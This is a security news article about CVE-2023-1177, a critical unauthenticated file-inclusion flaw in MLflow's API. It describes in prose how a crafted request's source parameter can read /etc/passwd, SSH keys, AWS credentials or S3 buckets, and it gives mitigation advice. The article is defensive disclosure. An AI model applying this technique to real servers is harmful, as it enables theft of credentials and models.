The now-patched vulnerability in the popular MLflow platform could expose AI and machine-learning models stored in the cloud and allow for lateral movement.
By: Lucian Constantin | CSO Senior Writer, CSO
MLflow, an open-source framework that's used by many organizations to manage their machine-learning tests and record results, received a patch for a critical vulnerability that could allow attackers to extract sensitive information from servers such as SSH keys and AWS credentials. The attacks can be executed remotely without authentication because MLflow doesn't implement authentication by default and an increasing number of MLflow deployments are directly exposed to the internet.
"Basically, every organization that uses this tool is at risk of losing their AI models, having an internal server compromised, and having their AWS account compromised," Dan McInerney, a senior security engineer with cybersecurity startup Protect AI, told CSO. "It's pretty brutal."
McInerney found the vulnerability and reported it to the MLflow project privately. It was fixed in version 2.2.1 of the framework that was released three weeks ago, but the release notes don't mention any security fix.
MLflow is written in Python and is designed to automate machine-learning workflows. It has multiple components that allow users to deploy models from various ML libraries; manage their lifecycle including model versioning, stage transitions and annotations; track experiments to record and compare parameters and results; and even package ML code in a reproducible form to share with other data scientists. MLflow can be controlled through a REST API and command-line interface.
All these capabilities make the framework a valuable tool for any organization experimenting with machine learning. Scans using the Shodan search engine reinforce this, showing a steady increase of publicly exposed MLflow instances over the past two years, with the current count sitting at over 800. However, it's safe to assume that many more MLflow deployments exist inside internal networks and could be reachable by attackers who gain access to those networks.
"We reached out to our contacts at various Fortune 500's [and] they've all confirmed they're using MLflow internally for their AI engineering workflow,' McInerney tells CSO.
The vulnerability found by McInerney is tracked as CVE-2023-1177 and is rated 10 (critical) on the CVSS scale. He describes it as local and remote file inclusion (LFI/RFI) via the API, where a remote and unauthenticated attackers can send specifically crafted requests to the API endpoint that would force MLflow to expose the contents of any readable files on the server.
For example, the attacker can include JSON as part of the request where they modify the source parameter to be whatever file they want on the server and the application will return it. One such file can be the ssh keys, which are usually stored in the .ssh directory inside the local user's home directory. However, knowing the user's home directory in advance is not a prerequisite for the exploit because the attacker can first read /etc/passwd file, which is available on every Linux system and which lists all the available users and their home directories. None of the other parameters sent as part of the malicious request need to exist and can be arbitrary.
What makes the vulnerability worse is that most organizations configure their MLflow instances to use Amazon AWS S3 for storing their models and other sensitive data. According to Protect AI's review of the configuration of the publicly available MLflow instances, seven out of ten used AWS S3. This means that attackers can set the source parameter in their JSON request to be the s3:// URL of the bucket used by the instance to steal models remotely.
It also means that AWS credentials are likely stored locally on the MLflow server so the framework can access S3 buckets, and these credentials are typically stored in a folder called ~/.aws/credentials under the user's home directory. Exposure of AWS credentials can be a serious breach because depending on the IAM policy, it can give attackers lateral movement capabilities into an organization's AWS infrastructure.
Requiring authentication for accessing the API endpoint would prevent exploitation of this flaw, but MLflow does not implement any authentication mechanism. Basic authentication with a static username and password can be added by deploying a proxy server like nginx in front of the MLflow server and forcing authentication through that. Unfortunately, almost none of the publicly exposed instances use such a setup.
"I can hardly call this a safe deployment of the tool, but at the very least, the safest deployment of MLflow as it stands currently is to keep it on an internal network, in a network segment that is partitioned away from all users except those who need to use it, and put behind an nginx proxy with basic authentication," McInerney says. "This still doesn't prevent any user with access to the server from downloading other users' models and artifacts, but at the very least it limits the exposure. Exposing it on a public internet facing server assumes that absolutely nothing stored on the server or remote artifact store server contains sensitive data."